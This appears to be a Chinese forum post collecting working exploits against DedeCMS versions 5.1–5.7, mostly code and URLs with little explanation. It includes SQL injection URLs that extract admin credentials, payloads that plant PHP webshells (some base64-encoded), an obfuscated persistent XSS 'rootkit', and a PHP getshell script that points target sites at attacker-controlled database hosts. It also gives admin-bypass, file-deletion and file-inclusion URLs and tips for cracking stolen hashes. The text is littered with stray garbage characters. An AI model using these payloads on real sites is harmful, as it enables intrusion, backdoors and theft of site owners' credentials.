|
|
: o' K+ q: O4 \0 O0 W9 I9 l+ q" W
Dedecms 5.6 rss注入漏洞
8 O* c1 w6 e8 \- L' n6 q6 uhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1# m% k% `- k$ L6 d( {) I( f
$ I( C; N6 T6 N9 A3 ~1 ~+ P B
6 z0 F; ^+ r! n3 C1 T
8 b: [* r$ ?1 i0 B0 h1 L2 Y# d" ?7 J) L7 |& W& H8 ?9 B% H. c
( T/ ]& E2 d1 L4 r" k
+ Z# H; N; w( ]- F+ `% U8 a1 {
* m1 R+ a# c! ?8 y; n
& |! A9 f9 V5 Y& \* cDedeCms v5.6 嵌入恶意代码执行漏洞6 z6 d4 }1 U3 h0 G2 o0 U2 |
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
# c; }- O0 g$ P& M/ i发表后查看或修改即可执行7 P5 z3 |; J0 z3 \/ H
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
) l8 ^, B7 X. O) @ Y生成x.php 密码xiao,直接生成一句话。$ ~1 `" L) Q7 V4 X
& Z5 k7 B! E; V
4 l8 A, }. P" P" F0 Y
, n+ d N. J5 e: ^1 ^8 u, Y
6 ~# l- Q' r( n( v' j- ?2 K7 {
9 F: O$ J3 K. M# c/ M
: {2 H& X2 _/ x; B- x. i% N3 g1 l2 J
( l. ^( F3 u2 A% @* r9 D7 }Dede 5.6 GBK SQL注入漏洞 M# S! k% T; G1 I
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';! X1 F J% X2 G& \- ~" `
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe' X. [: [* ~/ G0 }
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7, x- |9 l& N: A/ c/ X1 m
- y" d: z z9 V7 g3 A6 a' E
9 g( e: c V$ m1 k$ U( k# W: @2 b, u& Q6 c/ ^
1 Q% `: k: m% ^8 B- d
5 c; f* k' ^5 j f/ M2 s1 h
2 k; _. H+ x$ Y. H/ w; `9 ~, A8 P; y1 L/ @* C: o
; e/ U7 _4 e' F2 h4 W* a- PDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
0 e% `" p' h) W0 {- Khttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` : w' s l; H0 ]
2 Y. P, B r$ l' W$ Z
$ p+ L9 @1 x; } B m+ x
$ T; c6 y2 _' \" e! K: Q$ _ h7 b' n7 X6 i0 N& W9 @
, Z# h2 O. B. k# ^! q7 h$ C
6 ~) v1 U# }8 s1 y( CDEDECMS 全版本 gotopage变量XSS漏洞
1 K- A. B; K+ @& i$ F1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
- x# ^0 g& ^% l {3 O lhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="$ I5 x% W7 p X3 G
$ F% a( r& ?2 V" r7 Y3 h2 f1 u
3 u, W0 M( N1 D1 I2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
2 M# Q7 o1 r" _+ `) w1 nhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda- [3 A4 R B2 X1 b, J' q2 C
$ J/ E/ v$ G; l
8 a0 U. b4 Z* I, i: P/ Zhttp://v57.demo.dedecms.com/dede/login.php
/ j8 q+ k. f( i @- }! k; _/ X+ p' c1 S$ A o5 a
( [8 }9 P8 |: `3 ]4 o5 a, W# o/ i
color=Red]DeDeCMS(织梦)变量覆盖getshell
( f1 V9 S+ |& Y#!usr/bin/php -w
5 q6 k) W5 N3 G7 ~( h) k7 W<?php
( v2 o4 {8 ]1 I4 z8 z+ J _error_reporting(E_ERROR);( e4 }+ ^$ E0 t8 [
set_time_limit(0);
0 A; H2 ~. t2 o6 ^. i! Xprint_r('% C6 A: D" k, N1 @4 p" }
DEDEcms Variable Coverage
3 L+ k8 J/ e: G9 vExploit Author: www.heixiaozi.comwww.webvul.com
0 U' S: W( O- K4 Q$ Q);
! b( m7 V9 V( [' A2 k, `( ^echo "\r\n";
+ X8 p; ~7 O& c5 uif($argv[2]==null){
' ?3 t: P8 c1 T, Bprint_r('
% g. f4 }8 i- N8 \$ z+---------------------------------------------------------------------------+1 g2 J' K1 t9 m, Z" Q& h5 F" R
Usage: php '.$argv[0].' url aid path
. o( X# i5 m3 _# D' i1 vaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
) m% q5 ~# M5 S, ?! MExample:4 S* z3 i. r( z" ?' m' ?- H/ I
php '.$argv[0].' www.site.com 1 old, I2 r9 d0 x" z( n- x- z
+---------------------------------------------------------------------------+
& g$ x" e) U3 P/ ~' Q5 M2 O S) R');! x0 s+ K0 ^+ `7 F8 T3 `5 D
exit;
2 Y8 o# }7 ^! \, B8 y, m" p}
, @. _6 b. k" x6 b8 R$url=$argv[1];* z1 v! r) b5 z; {0 _4 h! D# \3 v
$aid=$argv[2];
6 H- H& s; {+ v3 q; Z$path=$argv[3];: P# ~8 F8 \2 Q( [" M6 {8 F
$exp=Getshell($url,$aid,$path);5 Z5 J/ W; S7 P! i2 @ @1 C
if (strpos($exp,"OK")>12){
' N) I3 i9 v5 b9 Q! M9 {echo "' f" \ H4 Y6 Y4 \6 q" Z
Exploit Success \n";# G/ |' c6 M9 @
if($aid==1)echo "
8 V- O, a! h& Y/ ^+ ]: Q* e( JShell:".$url."/$path/data/cache/fuck.php\n" ;
. _8 J. J" G' I( S P& ?
' c$ x. \9 |3 X2 J5 B9 Q8 I+ | p- j4 r" ?: [" b V8 _
if($aid==2)echo "% d7 w, q$ K1 g, w
Shell:".$url."/$path/fuck.php\n" ;
6 O- ]# t6 g3 R- i+ m* K; e X- E% @/ u2 k h* `5 ~2 ~2 {
' c" C# o% Q' l; O/ cif($aid==3)echo ", k! T, U: `* w, C5 Q5 c: M
Shell:".$url."/$path/plus/fuck.php\n";* j* g, h/ [) W
# z3 Z8 x6 i+ ?, {2 c6 Y7 H+ G' ?2 h
2 K; ~, `7 U5 Y) i( J2 l6 g}else{
' N) i0 \' Z1 K; Q# I% Y% ]echo "+ P9 L6 H6 l: J3 C: _9 {
Exploit Failed \n";5 ]' E$ ~" x2 q( S7 }9 D
}( s, x% k! [: e$ |# F* P) M
function Getshell($url,$aid,$path){
p8 Q \3 l$ }( t- ?- ]; D8 ]$id=$aid;
7 [8 W5 s- t& A0 u& g4 E$host=$url;
7 x i) i, _( L' e$port="80";
# \2 u' F! A) y! v' s' C" E$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";& P/ ~. ?% P; M+ I8 K+ @5 X
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
+ `/ z, }+ d) |; O0 x$data .= "Host: ".$host."\r\n";
" F4 j6 ]8 U# z- j& m$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
! T/ n5 E6 d! b+ q- u1 Y& W7 M$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";7 G7 W3 c, L) \0 `; M% U N8 W
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";' T1 S: ?/ J) S5 \
//$data .= "Accept-Encoding: gzip,deflate\r\n";, {! M, h# ]! ~
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
- j: P t5 A7 n# U& u$data .= "Connection: keep-alive\r\n";$ d8 `. g; @4 V9 w: @6 g
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
7 O1 i- ?+ I9 _+ S. s% D$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
% @# l: H% v' g$data .= $content."\r\n";
) j4 I. M6 c* r+ K8 e1 n$ock=fsockopen($host,$port);
: y' }5 k& }: }: R0 J2 cif (!$ock) {3 O: y/ X. S" x
echo "
) z5 r- p/ ]5 aNo response from ".$host."\n";
$ N' K3 o: E; f) h6 s}) c" ~$ g1 t0 {" }. c
fwrite($ock,$data);
- ]; W# m3 v6 S: Qwhile (!feof($ock)) {
: A; X2 q5 m1 t2 b; H8 ]$exp=fgets($ock, 1024);0 Z7 q( a$ c# e4 p5 m* `# X
return $exp;
; V* v/ N! M5 X" u# q}
; L# `) F' U3 r) o9 F: X}$ E. o6 l, ?3 u; X) { m @
% m4 u! T8 z8 U- j3 c
8 V' s( T" r# {! S* }: @6 y- M Y?>
% @% F: R- c2 @6 r6 Q2 s+ ?; i- U$ y3 l4 u Y$ r( z: \
9 E) r$ c# h5 J9 U' F4 k @& W' Q7 ?! q$ R! q* H7 K4 a
) H6 m8 l: F; G* `
9 Q, j8 k3 n, a+ t: w; ~! r
. u- R, [# x7 }+ P9 x. j
6 P. A ?; x' |: B% Z! ~
+ r, f9 T' d2 K5 p7 _( W7 z7 Y8 l# z
! |1 N; l% Z( D# R& C5 e JDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
. \+ ]6 S( x2 j" o$ B* Ehttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root* e: S, Q! C. J* y- l
$ X5 s5 w a9 ? E
' D- T$ \" I2 K' v
把上面validate=dcug改为当前的验证码,即可直接进入网站后台3 k; E# l5 ]' ~( ~) O
2 m; \, F7 h" Z$ \( {, l8 A( A% u$ G/ \7 e
此漏洞的前提是必须得到后台路径才能实现
/ a3 D) k+ W, u, J: i; d
2 O. |& I! [8 Q+ ]7 `$ p& l- b7 P, |+ w) J
1 G; J0 t {2 Y$ G( O- x7 h) ^
# ?" k0 |) O. e% H1 F, ]- [5 [, I, q8 D' ]
+ b8 [* ^7 h" V( T n w/ u1 P- f
' f! M+ W; S# e/ i+ X$ W3 {# W. ^* k6 s" P0 w3 M! e" i& c
$ L2 C& M: z9 `5 I3 H, x" B" C2 T( Z# Z, T" D9 I
Dedecms织梦 标签远程文件写入漏洞5 j3 {8 V/ i* N
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
9 ^% r" k* k" V( @6 b; |$ E, I6 j0 J: I8 B" ?
" |# h3 W3 Q1 o# q* Q/ z再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 * O' @2 o6 j2 m% }
<form action="" method="post" name="QuickSearch" id="QuickSearch">( M! w/ R3 X: X" O
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /> g* _" F& H3 P
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
$ m! Y X: W0 v" {<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
" ]# K: z6 L" i5 y" ^<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /># i/ u1 O9 P; q2 F
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
8 E" k" H% H) \0 x4 s<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
+ \8 m! }; w: z# s% s6 v<input type="text" value="true" name="nocache" style="width:400">
1 J, W+ N& @9 L! E( f3 z3 I5 Z9 |( ~" l<input type="submit" value="提交" name="QuickSearchBtn"><br />
! T7 D2 d+ U, v# k& }</form>1 g1 p' J0 k! J
<script>
~- L5 x& p7 Rfunction addaction(), _: K' S4 s _
{
* q: I0 } Z& F+ ^! F4 l: ~- [# Y' Kdocument.QuickSearch.action=document.QuickSearch.doaction.value;4 u) W( T8 D V$ e$ o9 L
}+ b$ R/ T& Z) W
</script>
' p* f/ m' B* ?8 m, p ^& Z4 f' ~# l Y! u
: y6 ^+ R) \9 Q0 F
' `6 b0 Y& r5 e! N* O) l
6 Q3 j5 b) Z/ K1 @8 }1 D
8 f1 D Y/ H7 ^ K0 R
R/ U6 k& n2 Z% @
' I" X P* D* R
3 P7 y9 M2 z* _/ A( n) }) Q) S3 ?0 {% R# J; G+ [! l
) I+ y; J; u$ A; ?2 e$ mDedeCms v5.6 嵌入恶意代码执行漏洞9 I; Q% `. e0 P7 m: j
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行& O4 \/ M% q" t+ I
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}9 b- \8 d% U4 ]" u; {, c
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
$ Q# o2 X: X, U+ O# BDedecms <= V5.6 Final模板执行漏洞7 X) S2 o& k( n) i% M* }9 P
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:6 }- R; f$ d3 f S* s7 t1 E/ J
uploads/userup/2/12OMX04-15A.jpg
( o- {8 m- b H- q% X# U. s4 M7 Z2 b
% M7 u0 s1 Y) Y+ u
模板内容是(如果限制图片格式,加gif89a):
2 ~, Y: M' h3 k" R% i5 X{dede:name runphp='yes'}, z) h/ |: w' ^* Y- f% v5 r
$fp = @fopen("1.php", 'a');
, M7 O0 B& s0 p; q- ~@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");- U+ K1 Z9 h/ h7 H- T+ k# ?* d
@fclose($fp);
* b4 f' V- B5 h) q/ i: B{/dede:name}; t5 c, a" j* @: S' j* A$ ^
2 修改刚刚发表的文章,查看源文件,构造一个表单:
( h) m" U; b1 d( |- Z<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">- {2 `+ G1 G0 Z) v+ ?: K% }, v, p" o! I
<input type="hidden" name="dopost" value="save" />0 s0 O& A5 m# u+ l5 m, P" ^
<input type="hidden" name="aid" value="2" />! T. ?+ w7 Y& Z, ]: {$ N
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
$ r! F) u( [/ Q6 z<input type="hidden" name="channelid" value="1" />
# h. v3 M, t: G+ W5 @7 F8 U& k<input type="hidden" name="oldlitpic" value="" />0 F, M& `" a+ q; u9 H4 e
<input type="hidden" name="sortrank" value="1275972263" />
/ t w t! o8 H9 {; z9 N, {: v
0 ~2 D/ y' M; f4 g* U$ X1 q! h! O3 E& K
<div id="mainCp">
+ Y( Q& f& W; [) o$ S# z<h3 class="meTitle"><strong>修改文章</strong></h3>* w w7 v9 {8 ]" Q0 g* q
& g5 A1 `6 u4 z8 C7 W
+ O& c+ y+ Q. x0 k7 e; N
<div class="postForm">7 ]3 ^: K3 ^; W# ?$ w
<label>标题:</label>
. }& r k8 |; \<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
" j7 e) @2 X. r6 [8 k" e) J4 ~4 \& {% s
* G1 N2 [5 e* q6 ^" P# y" r
<label>标签TAG:</label>0 Z% c( Q7 }* i4 n; Z
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
+ x. O) M# V0 @9 e+ F) i3 K5 |7 _$ x' i5 Z k, l* w3 K
+ L3 w! m; R" Q+ h: _; t, F$ r: w* e
<label>作者:</label>1 r$ J5 c: [4 f8 ]
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
0 B% ^& T( X; Y+ t& s( g# ^
! X, p- A) ]* |4 z; e$ v) L. T: T" e' U a
<label>隶属栏目:</label>
' H+ a$ V% p; {$ ]<select name='typeid' size='1'>4 b1 V: `# L, M. D, A0 Y2 N0 W
<option value='1' class='option3' selected=''>测试栏目</option>
7 k' f" _# R. p6 V5 M9 g- @</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)0 U# ?; z; G# X
% v- K$ i6 j' V9 q; c
3 A r% ^, I6 c3 x9 k% @! ?<label>我的分类:</label>
3 |! `2 J0 T' W<select name='mtypesid' size='1'>: D0 z4 Z j W2 y5 Y2 G- c
<option value='0' selected>请选择分类...</option>
5 J8 u5 A4 v, f1 ]! J& q# V<option value='1' class='option3' selected>hahahha</option>2 G; U; i& D) W6 |8 s3 }
</select>4 n* Y/ [7 P1 ^8 H
, i# M& |/ }1 z: {3 H, q
* b* w" b O" f* u; G' Z0 C/ D<label>信息摘要:</label>
' }2 w1 V, q7 z; D<textarea name="description" id="description">1111111</textarea>% P. O/ q) n5 M! R+ f# \ L
(内容的简要说明)
$ g# V- H& R' j0 b" G7 f: W- {) p W. T/ I! v5 p( U" ~9 H5 y
9 w5 N9 g; j5 P5 E<label>缩略图:</label>
) Y7 U' y: m+ f& k2 ?; q8 m- |7 }( t% P<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
" G) C3 M( [3 A, ~9 e% W S$ p9 Q! A+ I, N- X O0 \; n
1 b5 |- N9 V$ F& O<input type='text' name='templet'4 A& {( D% d4 B
value="../ uploads/userup/2/12OMX04-15A.jpg">+ y- X/ ^1 j8 z4 v1 W5 B
<input type='text' name='dede_addonfields'
# G1 `5 n+ U' ?# _/ s% wvalue="templet,htmltext;">(这里构造)8 A* V4 C0 D1 Q4 I9 X& L; I0 g) T
</div>8 }; `" p K2 H9 u1 y2 T: F# y0 s
6 N1 E: Q" Y# Y" F8 E* R
; Y# J3 h( B l+ m- Q9 P* {* N5 B<!-- 表单操作区域 -->
5 ^8 ^( F& {6 D$ k$ ]: A/ Q' H- {0 e<h3 class="meTitle">详细内容</h3>
" E: [5 v1 h# X- j: Y" r8 @- a$ t0 q. R& ?7 A
0 h( `1 C) F" V) u2 C<div class="contentShow postForm">1 a; U) M; | V! g
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
/ y5 Y, I* F! L- k; E1 T- q, j4 Q0 c/ g& K* ~
, i( g x& n( o M5 r/ I
<label>验证码:</label>
K5 ]: `, y* M9 q7 ^; B- a<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
) }4 c; ?8 B- |; k<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
5 U* C/ B% p$ }) t/ ?& [( d, r
6 }9 l9 o C6 w! `! c0 }& v3 J
9 e9 R& i* {$ ~% E) Q<button class="button2" type="submit">提交</button>
+ y1 Y! C% _( n4 D, ~4 n<button class="button2 ml10" type="reset">重置</button>5 Q6 b. Z6 E$ Q- B: w3 d
</div>; c' J* Z' u0 Q) j
: C# [- r# G+ p* b4 [! f
8 Z5 C! a: o6 S6 l% h/ o</div>. k' r5 K5 w' a# J& ^7 w& B
6 L4 {6 @7 Z$ S5 h
' x( W& B* W* _# e& u</form>" e6 g# d( z0 p6 E- ~7 @/ O; k4 B) D
3 }4 Y. p+ q+ J# J, f7 c4 z8 c$ Q
`* z, k, s& Q8 d$ B9 Z) ~ @$ M提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
* H8 Y; J! O5 f8 j! r假设刚刚修改的文章的aid为2,则我们只需要访问:. Z4 |4 `3 l7 x
http://127.0.0.1/dede/plus/view.php?aid=2 z! K/ ]+ T4 H* P9 |1 _
即可以在plus目录下生成webshell:1.php- g& G/ E. W9 M
" e# o2 s& i" c) J7 n# q
* n [2 o# _6 r0 S
. {3 ?" _: V9 v& T! u% x- A6 o
+ \6 \- Z' |* Y8 e2 X3 w& I0 ?; X, u" f$ \; E f; L, ^
+ O; [. ^) ^* o V; q7 f7 P& `) j& @- R# _2 R
+ y$ N y0 s- |7 F X& m
0 Q) V* {( d9 [! C$ ?3 R2 a* Z# B6 e( p; {$ Z$ g, R
6 D; }! y* w( k9 S7 I2 g5 d
+ O: K8 H( A# l3 d" b6 ^9 EDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
" s# u3 z" c( _8 s) r* N, J" PGif89a{dede:field name='toby57' runphp='yes'}9 \0 }: S( u g3 Q( L
phpinfo();, v( `& E8 ~( |* Z0 M. J- @
{/dede:field}" s! v" X( S" s R% |! b4 w
保存为1.gif
1 Q0 d: O$ o& S" S<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> % m1 ^) E! k! }/ [
<input type="hidden" name="aid" value="7" /> 2 e* p8 ]+ i9 J K+ b: l- q
<input type="hidden" name="mediatype" value="1" /> 7 R& k% I! Q( i3 [0 U) U
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ! `2 N& S* f$ a4 w8 ^/ h
<input type="hidden" name="dopost" value="save" />
7 F& w$ d/ L! w+ K9 d. T: F5 X9 v5 X6 K<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
' Y; v8 y2 c) A/ B<input name="addonfile" type="file" id="addonfile"/> 9 j) P6 v, T$ `- c* j8 P
<button class="button2" type="submit" >更改</button>
+ ] I' [2 i$ M& l</form>
; S$ f9 \- g: U- \6 s' i' ~
7 n! ^" |' ~3 m% }+ i8 e' n7 K5 c$ X P) x) k* }! Q* r% Z
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
l! O- H5 u9 }" Z$ l发表文章,然后构造修改表单如下:9 M0 M- I+ @1 P4 n4 m) A
8 p3 y4 {6 Q9 c3 h5 y
/ V$ z/ V, k0 a- A. X<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ! z! w* n! R4 f8 U. ]
<input type="hidden" name="dopost" value="save" />
1 b; [1 ]! V; H2 _6 Y6 _) x<input type="hidden" name="aid" value="2" /> 6 B9 j6 f% ?& Y. z
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
& L; r9 u' F9 c7 q( Q" w* o3 t Z<input type="hidden" name="channelid" value="1" />
: G4 c2 ]8 I k2 a, i+ ?* D/ U<input type="hidden" name="oldlitpic" value="" />
# h( \% a q5 I; U7 A2 R& K<input type="hidden" name="sortrank" value="1282049150" />
b! t2 l# J2 ]+ @. t<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
# l0 _9 x1 }0 B$ Q2 p<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
" }+ T" ~$ H' k, q2 B g<select name='typeid' size='1'>
& t% C8 m$ \* s$ Q<option value='1' class='option3' selected=''>Test</option>
6 A/ D5 X6 }6 h& X6 k( R0 a<select name='mtypesid' size='1'>
$ J" C: D7 w7 W+ T<option value='0' selected>请选择分类...</option> ( A6 y& `8 u; E, V$ O4 v4 p
<option value='1' class='option3' selected>aa</option></select>
x8 `; C3 G+ U/ A3 s& _<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
3 C, |# M% h2 m0 e- w& s# i4 y<input type='hidden' name='dede_addonfields' value="templet"> ( `/ y4 ~8 n, {9 f
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
* s2 J. e0 @+ Z/ v<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
7 r* G6 L- @; L9 D1 l<button class="button2" type="submit">提交</button> 9 r1 d4 ^. _" E
</form>
9 d5 P1 L: t9 ?9 X% a# R
& R% w! e8 K( b, n7 h5 a! w! O) p1 x/ r; M( m
5 k: i) `% {" ^! k7 L) [
+ _4 _% m; p& n& z/ K& c5 O! c
* H* l; M! w( u' b; ?) T& d: f2 G3 i9 ~3 `
7 ~4 t6 |3 i4 u* _3 j' V" |
% k5 d* p l/ h( c8 S
( Q4 s, o' K& Y. t
4 k; Z3 {( V; t8 k
6 {* X: q. r* M* Q" F0 ^, G l3 D
# E3 m8 `! ` A% H) q, F织梦(Dedecms)V5.6 远程文件删除漏洞
+ ~, E5 `8 d6 u X! U6 c1 Q4 ?/ Mhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
- c3 m0 w0 A. t) e4 q/ B/ M
' Q; v% ^; S9 [7 a: ?4 O4 B% h4 n3 Q9 d- j A: r
7 V1 Q' k$ _4 O8 `: @
8 l, S# T) f* P& t ]7 x" Q
1 `. a! Y5 k" W; ]4 u: ?6 m8 l0 e, L+ a" ~' A& g# Z; m" |9 a
9 y, z" ]1 i" X' r7 U6 @/ u" l* q3 p& ]+ ^- y# Q& z" c8 K% o
7 s6 [+ o" A7 [1 ] k
; ^( r2 j2 H6 S* n织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
6 s( s: A$ u3 g% t Shttp://www.test.com/plus/carbuya ... urn&code=../../; `% w) X& ]7 N$ y+ ~. C" z ~
. U! e6 a% f) L! L5 l$ q; b8 k1 |
9 [9 j, e. L2 W1 Y, S" V% P& U
1 w5 D0 J- o0 R7 ^7 r" z
; P$ m, X: |. p3 w, H3 N! N1 w9 |9 f; j0 L& C; Y, M. Z# S) V
- O% j% R1 ^9 n$ a4 D
7 i7 L! W" g6 R( z3 c' m! K
7 Q5 H8 I, }: H$ s! R0 o/ n s3 X
4 w$ F9 r5 q$ M/ `; O/ m* @: `8 I! X6 l* S
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
0 P4 M$ D2 t$ b* h/ Cplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
6 g' r& t1 o6 f+ m密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
* I* m5 o8 u3 _ B1 b- [
2 ]& P! B7 @+ F1 M, p$ S# W; g, c1 `
9 C! h7 T# l! p3 G1 F# g4 R: Z
" H! }% J* \& t+ y
) H& [; [0 h, n% v4 f+ P& ]- o( E( ?3 G( |
: F0 \2 e7 _8 l+ H+ c( T* |* i i: }9 E
" F# f/ I M0 K5 d/ o# O' E* x7 g. }5 O& s
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞1 L- L& f7 u! N( _
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
# J v: \ Z7 h$ a' K; B* f0 j: m9 v$ y3 @4 o/ A+ O- ^6 O+ S, e+ j! u
, F# R' U, x- Z7 Z# J) v4 P* f v# |5 I: `4 a, Y/ a
0 q9 I$ d6 I6 v1 d+ m4 l$ C6 j; B
% S5 |5 r# p& j& k6 y2 [
1 J- H' \9 P; I0 W9 T: V, O* S
